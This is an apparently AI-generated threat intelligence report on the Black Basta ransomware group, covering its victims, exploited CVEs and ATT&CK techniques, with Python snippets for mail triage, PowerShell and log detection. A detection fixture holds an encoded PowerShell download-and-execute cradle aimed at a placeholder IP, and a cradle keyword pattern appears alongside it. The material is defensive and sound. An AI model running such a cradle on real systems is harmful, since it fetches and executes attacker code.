Threat Intelligence Report
Executive Summary

Automated AI-generated threat intelligence report for blackbasta.

Report Content

Threat Actor Profile: Black Basta

Overview and Attribution

Black Basta is a prolific ransomware operation first observed in April 2022, with development activity traced back to at least early February 2022. The group is a financially motivated cybercriminal actor operating a ransomware-as-a-service (RaaS) model. Its country of origin has not been officially confirmed, but the speed at which it amassed victims and the maturity of its negotiation tactics strongly suggest that Black Basta is not a new operation but a rebrand of an established top-tier ransomware gang that brought its experienced affiliates with it; the group's immediate use of advanced, well-established tooling supports this assessment. The group maintains a data leak site (DLS) and a negotiation chat portal on the Tor network, indicating a structured double-extortion operation.

Victimology and Impact

Black Basta has demonstrated broad and aggressive targeting, with at least 523 victims listed on its public leak site as of early 2025. Victimology is global, with a focus on English-speaking and European organizations. Targeting is opportunistic across sectors, with notable concentrations in critical infrastructure, manufacturing, healthcare, and technology companies. The group's ability to compromise and encrypt large networks quickly, combined with its willingness to negotiate, makes it a critical threat. Black Basta has been observed exploiting several high-profile vulnerabilities: CVE-2024-1709 (ConnectWise ScreenConnect authentication bypass, CVSS 10.0) for initial access; CVE-2024-37085 (VMware ESXi Active Directory integration bypass via the "ESX Admins" group) to take over domain-joined hypervisors; CVE-2022-30190 ("Follina", Microsoft Support Diagnostic Tool) for code execution from malicious documents; and CVE-2024-26169 (Windows Error Reporting Service), CVE-2021-42278/42287 ("NoPac"), CVE-2021-1675/34527 ("PrintNightmare"), and CVE-2020-1472 ("ZeroLogon") for privilege escalation. The quick turnaround on newly disclosed vulnerabilities shows a proactive approach to incorporating them into the attack chain, so patch status for these specific CVEs is a first-order check when assessing exposure to this actor.

Tactics, Techniques, and Procedures (TTPs)

Black Basta employs a multi-stage attack chain that combines commodity malware, custom tools, and living-off-the-land binaries and scripts (LOLBAS) to reach its objectives. MITRE ATT&CK tactic and technique identifiers are given in parentheses below.

Initial Access (TA0001): The primary initial access vector is spear-phishing with malicious attachments (T1566.001). Victims receive emails carrying password-protected ZIP archives that contain malicious documents (.doc, .pdf, .xls). Password protection keeps the archive opaque to mail-gateway content scanning, while the password supplied in the lure lets the recipient open it. The documents deliver the initial payload, typically Qakbot, which then acts as a loader for subsequent stages.
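
As an added example (not part of the original report or of any vendor product), the following Python routine performs the mail-gateway check that this lure is designed to defeat: it parses an attached ZIP without extracting anything, reads bit 0 of each entry's general-purpose flag (the ZIP encryption marker), and returns a "block" verdict when an encrypted archive hides one of the document or script types used in these lures. Because the standard library cannot write password-protected archives, the sample archive is written unencrypted and its header flag is flipped by a fixture helper; the file name, contents and risky-extension list are constructed for the example.

```python
import io
import pathlib
import zipfile

# Inner file types worth blocking when they arrive inside a password-protected archive.
# Constructed list for the example; tune it to the lure types seen in your own mail flow.
RISKY_INNER = {".doc", ".docm", ".xls", ".xlsm", ".xlsb", ".pdf", ".lnk", ".js", ".vbs",
               ".iso", ".img", ".exe", ".zip"}
ZIP_ENCRYPTED = 0x1   # bit 0 of the general purpose bit flag in the local/central headers


def triage_zip(data: bytes) -> dict:
    """Inspect a ZIP attachment and return a verdict without extracting anything."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"verdict": "not-a-zip", "encrypted": [], "risky": []}
    entries = zf.infolist()
    # flag_bits comes straight from the central directory; no password is needed to read it
    encrypted = [zi.filename for zi in entries if zi.flag_bits & ZIP_ENCRYPTED]
    risky = [zi.filename for zi in entries
             if pathlib.PurePosixPath(zi.filename).suffix.lower() in RISKY_INNER]
    if encrypted and risky:
        verdict = "block"       # opaque to content scanning and carrying a known lure type
    elif encrypted or risky:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "encrypted": encrypted, "risky": risky}


def build_sample_zip() -> bytes:
    """Constructed fixture: an unencrypted archive holding a fake .doc lure."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("Invoice_4471.doc", b"constructed sample, not a real document")
    return buf.getvalue()


def mark_encrypted(zip_bytes: bytes) -> bytes:
    """Fixture helper: set the encryption bit in every local and central directory header.
    zipfile cannot write encrypted archives, so the flag is patched by hand; the result
    claims to be encrypted, which is all triage_zip reads (the entry data is untouched)."""
    buf = bytearray(zip_bytes)
    # local file header: flag at offset 6; central directory header: flag at offset 8
    for sig, flag_off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(sig)
        while pos != -1:
            buf[pos + flag_off] |= ZIP_ENCRYPTED
            pos = buf.find(sig, pos + len(sig))
    return bytes(buf)


if __name__ == "__main__":
    plain = build_sample_zip()
    print("plain:", triage_zip(plain))
    print("password-protected:", triage_zip(mark_encrypted(plain)))
```

The verdict is derived entirely from archive metadata, so the check works on archives the gateway cannot decrypt; pair it with a nested-archive check in production, since a ZIP inside a ZIP is listed here only by extension.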

Execution (TA0002): Once initial access is achieved, Black Basta operators execute payloads by several means. They use Windows Management Instrumentation (WMI) (T1047), driven by a custom script called "Invoke-TotalExec", to push the ransomware binary to hosts across the network. They also run payloads on remote hosts as system services via PsExec (T1569.002). Additionally, they use base64-encoded PowerShell commands (T1059.001) to download and execute further scripts, a flexible and relatively stealthy execution path because the process command line shows only the encoded blob.
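
As an added example (not from the original report or from any vendor tooling), the following Python snippet shows how a detection engineer might flag the three execution patterns above in process-creation telemetry: it decodes the UTF-16LE base64 blob that powershell.exe accepts after -EncodedCommand (or any unambiguous prefix such as -e or -enc), looks for download-and-execute cradles in the decoded text, and tags processes whose parent is WmiPrvSE.exe or PSEXESVC.exe, the parents left behind by WMI and PsExec remote execution. The event records, hostnames, paths and URL are constructed for the example.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match every prefix and capture the base64 blob that follows it.
_ENC_FLAGS = ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)]
_ENC_RE = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(sorted(_ENC_FLAGS, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)
# Download-and-execute cradles commonly seen once the command is decoded.
_CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b"
    r"|net\.webclient|start-bitstransfer|frombase64string",
    re.IGNORECASE,
)
# World-writable staging directories where a pushed ransomware binary typically lands.
_STAGING_RE = re.compile(r"\\(?:windows\\temp|users\\public|programdata)\\", re.IGNORECASE)
# Parent processes that indicate remote execution via WMI (T1047) or PsExec (T1569.002).
_REMOTE_PARENTS = {"wmiprvse.exe": "remote_exec_wmi", "psexesvc.exe": "remote_exec_psexec"}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: do not crash the pipeline on attacker-controlled input


def classify_event(event: dict) -> dict:
    """Tag one process-creation record with the execution patterns it matches."""
    tags = []
    cmd = event["cmdline"]
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        tags.append("encoded_powershell")
        if _CRADLE_RE.search(decoded):
            tags.append("download_cradle")
    if parent in _REMOTE_PARENTS:
        tags.append(_REMOTE_PARENTS[parent])
    if _STAGING_RE.search(cmd):
        tags.append("staging_dir_binary")
    return {"host": event["host"], "cmdline": cmd, "decoded": decoded, "tags": tags}


def triage(events) -> list:
    """Return only the records that matched at least one pattern, in input order."""
    return [r for r in map(classify_event, events) if r["tags"]]


def _encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records in a Sysmon Event ID 1 / Security 4688 style; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-FIN-07", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/s.ps1')")},
    {"host": "FS02", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"cmd.exe /c C:\Windows\Temp\locker.exe"},
    {"host": "WS-FIN-07", "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"host": "DC01", "parent": r"C:\Windows\PSEXESVC.exe",
     "cmdline": r"C:\Windows\Temp\locker.exe -forcepath"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["tags"], (hit["decoded"] or "")[:60])
```

The benign scheduled backup script in the third record produces no tags, which is the point of decoding rather than alerting on every -ExecutionPolicy Bypass: the encoded form is only interesting for what it hides.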

Persistence (TA0003): To keep a foothold in the compromised environment, Black Basta creates new user accounts (T1136), often with names like "temp", "r", or "admin", and adds them to the local Administrators group (T1098) to guarantee elevated access. The group also establishes persistence by registering benign-looking Windows services (T1543.003) for the ransomware binary, and Qakbot uses DLL search order hijacking (T1574.001) to execute its payload.
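
As an added example (not from the original report), here is a small correlation in Python over Windows Security events that catches the account-creation pattern above: a 4720 (user account created) followed within an hour by a 4732 (member added to a security-enabled local group) for BUILTIN\Administrators (S-1-5-32-544), joined on the new account's SID, with the short throwaway names from reporting as a secondary signal. The event records, hostnames, SIDs and timestamps are constructed; real 4720 and 4732 events carry the account SID in TargetSid and MemberSid respectively and the group SID in the 4732 TargetSid.

```python
from datetime import datetime, timedelta

ADMIN_GROUP_SIDS = {"S-1-5-32-544"}          # BUILTIN\Administrators
SUSPICIOUS_NAMES = {"temp", "r", "admin"}    # throwaway names reported in Black Basta intrusions
WINDOW = timedelta(hours=1)                  # create-then-elevate must happen within this window


def correlate(events: list) -> list:
    """Return one alert per newly created account that was elevated or oddly named."""
    creations = {e["target_sid"]: e for e in events if e["id"] == 4720}
    admin_adds = [e for e in events if e["id"] == 4732 and e["group_sid"] in ADMIN_GROUP_SIDS]
    alerts = []
    for sid, created in creations.items():
        # join on SID, not name: the name can be renamed later, the SID cannot
        elevated = [a for a in admin_adds
                    if a["member_sid"] == sid
                    and timedelta(0) <= a["time"] - created["time"] <= WINDOW]
        reasons = []
        if elevated:
            delay = int((elevated[0]["time"] - created["time"]).total_seconds())
            reasons.append(f"added to Administrators {delay}s after creation by {elevated[0]['subject']}")
        if created["target_name"].lower() in SUSPICIOUS_NAMES:
            reasons.append("throwaway account name")
        if reasons:
            alerts.append({
                "time": created["time"], "host": created["host"],
                "account": created["target_name"], "sid": sid,
                "created_by": created["subject"],
                "severity": "high" if elevated else "medium", "reasons": reasons,
            })
    return sorted(alerts, key=lambda a: a["time"])


def _ev(ts, host, eid, subject, **fields):
    """Build a constructed event record with an ISO timestamp."""
    return {"time": datetime.fromisoformat(ts), "host": host, "id": eid, "subject": subject, **fields}


# Constructed sample events, not real logs. Field names mirror the 4720/4732 XML but are shortened.
SAMPLE_EVENTS = [
    _ev("2025-03-01T02:14:05", "FS02", 4720, r"CORP\svc-backup",
        target_name="temp", target_sid="S-1-5-21-1111-2222-3333-1105"),
    _ev("2025-03-01T02:14:09", "FS02", 4732, r"CORP\svc-backup",
        member_sid="S-1-5-21-1111-2222-3333-1105", group_sid="S-1-5-32-544"),
    _ev("2025-03-01T03:02:41", "WS-FIN-07", 4720, r"WS-FIN-07\localadmin",
        target_name="r", target_sid="S-1-5-21-4444-5555-6666-1012"),
    _ev("2025-03-01T09:00:12", "DC01", 4720, r"CORP\helpdesk1",
        target_name="jsmith", target_sid="S-1-5-21-1111-2222-3333-1106"),
    _ev("2025-03-01T09:00:30", "DC01", 4732, r"CORP\helpdesk1",
        member_sid="S-1-5-21-1111-2222-3333-1106", group_sid="S-1-5-32-545"),  # Users: benign
    _ev("2025-03-01T14:20:00", "FS02", 4732, r"CORP\itadmin",
        member_sid="S-1-5-21-1111-2222-3333-1001", group_sid="S-1-5-32-544"),  # no 4720: ignored
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(a["severity"], a["host"], a["account"], "; ".join(a["reasons"]))
```

The 4732 for a pre-existing account is deliberately ignored here; elevating an existing account is routine administration, while creating one and elevating it within seconds from a service account is not.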

Privilege Escalation (TA0004): Once inside the network, Black Basta escalates privileges by modifying Group Policy Objects (GPOs) (T1484.001), which serves both privilege escalation and defense evasion, and by reusing the DLL search order hijacking (T1574.001) and Windows service creation (T1543.003) techniques described above to obtain higher-level permissions. The domain-level vulnerabilities listed under Victimology (NoPac, PrintNightmare, ZeroLogon) serve the same tactic.

Toolset and Capabilities

Black Basta's toolset is extensive and indicative of a highly organized and well-resourced operation. For discovery and enumeration, operators use AdFind, BloodHound, PowerView, PSNmap, and SoftPerfect NetScan to map the Active Directory environment and identify high-value targets. For credential theft they rely on Mimikatz. Command and control and lateral movement are handled with Brute Ratel C4, Cobalt Strike, Metasploit, and PowerSploit. For defense evasion they use "Backstab", a tool that loads the legitimately signed Process Explorer driver and uses it to kill protected endpoint detection and response (EDR) processes; a load of that driver on a host where nobody is running Process Explorer is itself a useful detection signal. Data exfiltration is performed with RClone and the Qaz[.]im file-sharing service. The group also leverages a wide array of legitimate remote monitoring and management (RMM) tools, including AnyDesk, Atera, NetSupport, ScreenConnect, Splashtop, and Supremo, for persistent remote access, and LOLBAS utilities such as BITSAdmin, PsExec, and Quick Assist to blend in with routine administrative activity. This toolset, combined with prompt exploitation of critical vulnerabilities, makes Black Basta a highly capable and dangerous ransomware group.

Source

AI Generated (DeepSeek)

Created

April 29, 2026 14:30

Last Updated

April 29, 2026 14:30
